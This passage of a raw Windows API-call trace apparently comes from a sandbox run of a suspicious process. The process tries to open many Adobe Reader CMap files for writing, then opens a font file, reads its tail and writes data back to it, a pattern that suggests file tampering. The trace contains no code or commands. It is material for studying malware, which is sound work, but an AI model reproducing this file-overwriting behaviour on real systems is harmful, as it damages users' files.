10.0\\resource\\cmap\\adobe-japan1-h-host"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.411] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-Host", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-Host", lpFilePart=0x331f690*="Adobe-Japan1-H-Host") returned 0x4a [0097.411] GetLastError () returned 0x5 [0097.411] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0097.411] LocalFree (hMem=0x69e2b0) returned 0x0 [0097.411] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0097.411] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0097.411] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.412] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.412] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Japan1-H-Host" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-japan1-h-host")) returned 0x20 [0097.412] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-Mac" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-h-mac"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.412] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-Mac", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-Mac", lpFilePart=0x331f690*="Adobe-Korea1-H-Mac") returned 0x49 [0097.412] GetLastError () returned 0x5 [0097.412] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0097.412] LocalFree (hMem=0x69e2b0) returned 0x0 [0097.412] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0097.412] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0097.412] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.413] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.413] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\Adobe-Korea1-H-Mac" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\adobe-korea1-h-mac")) returned 0x20 [0097.413] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\CNS-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\cns-euc-h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.413] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\CNS-EUC-H", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\CNS-EUC-H", lpFilePart=0x331f690*="CNS-EUC-H") returned 0x40 [0097.413] GetLastError () returned 0x5 [0097.413] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0097.413] LocalFree (hMem=0x69e2b0) returned 0x0 [0097.413] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0097.413] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0097.414] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.414] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.414] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\CNS-EUC-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\cns-euc-h")) returned 0x20 [0097.414] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETHK-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ethk-b5-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.414] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETHK-B5-V", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETHK-B5-V", lpFilePart=0x331f690*="ETHK-B5-V") returned 0x40 [0097.414] GetLastError () returned 0x5 [0097.414] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0097.414] LocalFree (hMem=0x69e2b0) returned 0x0 [0097.414] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0097.414] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0097.415] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.415] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.415] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\ETHK-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ethk-b5-v")) returned 0x20 [0097.415] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk-euc-ucs2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.415] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-UCS2", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-UCS2", lpFilePart=0x331f690*="GBK-EUC-UCS2") returned 0x43 [0097.415] GetLastError () returned 0x5 [0097.415] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0097.415] LocalFree (hMem=0x69e2b0) returned 0x0 [0097.416] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0097.416] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0097.416] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.416] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.416] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBK-EUC-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbk-euc-ucs2")) returned 0x20 [0097.416] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-UCS2C" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbpc-euc-ucs2c"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.416] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-UCS2C", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-UCS2C", lpFilePart=0x331f690*="GBpc-EUC-UCS2C") returned 0x45 [0097.416] GetLastError () returned 0x5 [0097.417] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0097.417] LocalFree (hMem=0x69e2b0) returned 0x0 [0097.417] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0097.417] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0097.417] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.417] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.417] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\GBpc-EUC-UCS2C" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\gbpc-euc-ucs2c")) returned 0x20 [0097.417] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdlb-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdlb-b5-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.417] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdlb-B5-V", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdlb-B5-V", lpFilePart=0x331f690*="HKdlb-B5-V") returned 0x41 [0097.418] GetLastError () returned 0x5 [0097.418] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0097.418] LocalFree (hMem=0x69e2b0) returned 0x0 [0097.418] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0097.418] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0097.418] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.418] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.418] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKdlb-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkdlb-b5-v")) returned 0x20 [0097.418] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKscs-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkscs-b5-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.419] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKscs-B5-V", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKscs-B5-V", lpFilePart=0x331f690*="HKscs-B5-V") returned 0x41 [0097.419] GetLastError () returned 0x5 [0097.419] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0097.419] LocalFree (hMem=0x69e2b0) returned 0x0 [0097.419] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0097.419] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0097.419] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.419] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.419] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HKscs-B5-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\hkscs-b5-v")) returned 0x20 [0097.419] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-ucs2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.420] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-UCS2", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-UCS2", lpFilePart=0x331f690*="KSCms-UHC-UCS2") returned 0x45 [0097.420] GetLastError () returned 0x5 [0097.420] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0097.420] LocalFree (hMem=0x69e2b0) returned 0x0 [0097.420] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0097.420] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0097.420] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.420] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.420] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\KSCms-UHC-UCS2" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\kscms-uhc-ucs2")) returned 0x20 [0097.421] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-ETen-B5" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-eten-b5"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.421] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-ETen-B5", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-ETen-B5", lpFilePart=0x331f690*="UCS2-ETen-B5") returned 0x43 [0097.421] GetLastError () returned 0x5 [0097.421] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0097.421] LocalFree (hMem=0x69e2b0) returned 0x0 [0097.421] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0097.421] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0097.421] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.421] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.421] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UCS2-ETen-B5" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\ucs2-eten-b5")) returned 0x20 [0097.422] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UTF16-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unicns-utf16-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.673] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UTF16-V", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UTF16-V", lpFilePart=0x331f690*="UniCNS-UTF16-V") returned 0x45 [0097.673] GetLastError () returned 0x5 [0097.673] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0097.673] LocalFree (hMem=0x69e2b0) returned 0x0 [0097.673] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0097.673] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0097.674] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.674] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.674] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniCNS-UTF16-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unicns-utf16-v")) returned 0x20 [0097.674] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-ucs2-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.674] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-V", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-V", lpFilePart=0x331f690*="UniJIS-UCS2-V") returned 0x44 [0097.674] GetLastError () returned 0x5 [0097.674] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0097.675] LocalFree (hMem=0x69e2b0) returned 0x0 [0097.675] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0097.675] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0097.675] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.675] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.675] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniJIS-UCS2-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\unijis-ucs2-v")) returned 0x20 [0097.675] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UTF16-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\uniks-utf16-v"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.676] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UTF16-V", nBufferLength=0x104, lpBuffer=0x331f694, lpFilePart=0x331f690 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UTF16-V", lpFilePart=0x331f690*="UniKS-UTF16-V") returned 0x44 [0097.676] GetLastError () returned 0x5 [0097.676] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x331f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̱폈H̱퐔H̱ḺꩨǷ\x01") returned 0x13 [0097.676] LocalFree (hMem=0x69e2b0) returned 0x0 [0097.676] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x331d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0097.676] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x331f894) [0097.676] RtlUnwind (TargetFrame=0x331f8fc, TargetIp=0x406ffc, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.676] RtlUnwind (TargetFrame=0x331f920, TargetIp=0x407184, ExceptionRecord=0x331f378, ReturnValue=0x0) [0097.676] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\UniKS-UTF16-V" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\uniks-utf16-v")) returned 0x20 [0097.677] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\AdobeHebrew-Italic.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\adobehebrew-italic.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0097.677] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0097.678] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x11a6c [0097.678] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x331f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x331f8c0*=0) returned 0x0 [0097.678] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.678] ReleaseMutex (hMutex=0x168) returned 1 [0097.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeHebrew-Italic.otf", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0097.678] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeHebrew-Italic.otf", cchWideChar=22, lpMultiByteStr=0x1f88a64, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeHebrew-Italic.otf", lpUsedDefaultChar=0x0) returned 22 [0097.678] ReadFile (in: hFile=0x1ec, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x331f278*=0x4000, lpOverlapped=0x0) returned 1 [0097.694] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x10a6c [0097.694] ReadFile (in: hFile=0x1ec, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x331f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x331f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.698] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x331f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x331f2e8*=0) returned 0x10a6c [0097.698] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x331f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x331f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.699] SetFilePointer (in: hFile=0x1ec, 